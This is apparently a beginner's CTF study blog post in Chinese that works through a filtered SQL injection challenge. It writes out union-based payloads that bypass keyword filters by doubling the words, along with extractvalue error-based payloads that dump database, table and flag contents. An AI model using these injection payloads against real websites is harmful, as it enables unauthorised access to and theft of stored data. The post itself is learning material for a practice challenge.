webctf09Day主要学习了下SQL注入 例题bugweb 多次

                                 我要成为web🐕

数据库查询语言!
sql注入是 用户提交的语句被数据库执行了!
–也是是注释符

1.多次
在这里插入图片描述 打开题目什么也没有呀!
看url里有个id试一试1/2/3/4。。。
发现有提示
You can do some SQL injection in here.
SQL注入?
这怎么注入呢?

先是报错注入
个人理解是利用报错点,来进行注入,也就是实现数据库功能!

这个题我先试了试:
id=1’是报错
id=1‘’是对的
用#(%23)的时候还要url编码,不然也报错
id=1‘%23是对的
那试一试and或or
id=1’ and 1=1%23错的
不知道为啥错!
大佬说是过滤了一些东西!是什么呢?

听大佬说这里^(异或)可以检验
在这里插入图片描述那就试一试
^(0)是对的
^(1)是错的
说明了异或里是错的那界面就显示正确!
试一试(length(‘or’)==0)报错,说明里面是对的
(length(‘or’)!=0)正确,里面是错的。
说明or被过滤了。
同理:and。union,select…都被过滤了

接下来试一试字段数:
构造payload:
id=1’ oorrder by 1%23 对的
这里order里有or,使用双写防止过滤!

再试一试id=2,3,4,5…
发现3以后都报错了!
那字段就是2了。
这是为什么呢

接下来,利用:
联合查询,测试字段显示的顺序以及那些会回显,输入0’ union select 1,2#
让id=-1或0
id变成任何不存在的值都可以,这样才可以回显2位置的值,
构造payload:
id=0’ uniounionn selecselectt 1,2 %23
发现页面显示2,于是从2处注入。

接下来就是常用的从暴库–》☠表–》☠列名–》☠字段
先爆数据库:
payload:id=0’ uniounionn selecselectt 1,database() %23

得到web1002-1
爆表名
payload:id=0’ uniounionn selecselectt 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()%23
得到flag1

我们来爆flag1:
id=0’ uniounionn selecselectt 1,group_concat(table_name) from infoorrmation_schema.columns where table_name=‘flag1’%23
得到flag1,flag1

爆数据
id=0’ uniounionn selecselectt 1,group_concat(flag1) from flag1 %23

得到usOwycTju+FTUUzXosjr

再id=0’ uniounionn selecselectt 1,group_concat(address) from flag1 %23

得到: ./Once_More.php
下一关地址

对id尝试单引号注入,发现开启了报错回显,且sql语句使用单引号
因此使用报错注入

 ?id=1' and extractvalue(1,concat('~',(select database()))) %23

?id=1' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables WHERE table_schema=database()))) %23

?id=1' and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='flag2'))) %23 

?id=1' and extractvalue(1,concat('~',(select group_concat(flag2) from flag2))) %23

大佬
大佬
大佬

sql注入还是不太懂!

了解一下SQL一般注入的流程吧

SQL注入之联合查询注入

SQL注入基础:1.union注入

sql注入之order by注入

你真的会SQL注入攻击吗?(下)

sql注入-union select

mysql注入漏洞

今天好累☪🕛
只搞懂了一点点!
主要是sql注入流程不知道为什么这样,原理是什么呀?
现在早知道简单的流程,用用大佬的语句🐷
1 找注入点
2 找字段
3 看回显
4 3爆
🐕命要紧,😴

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值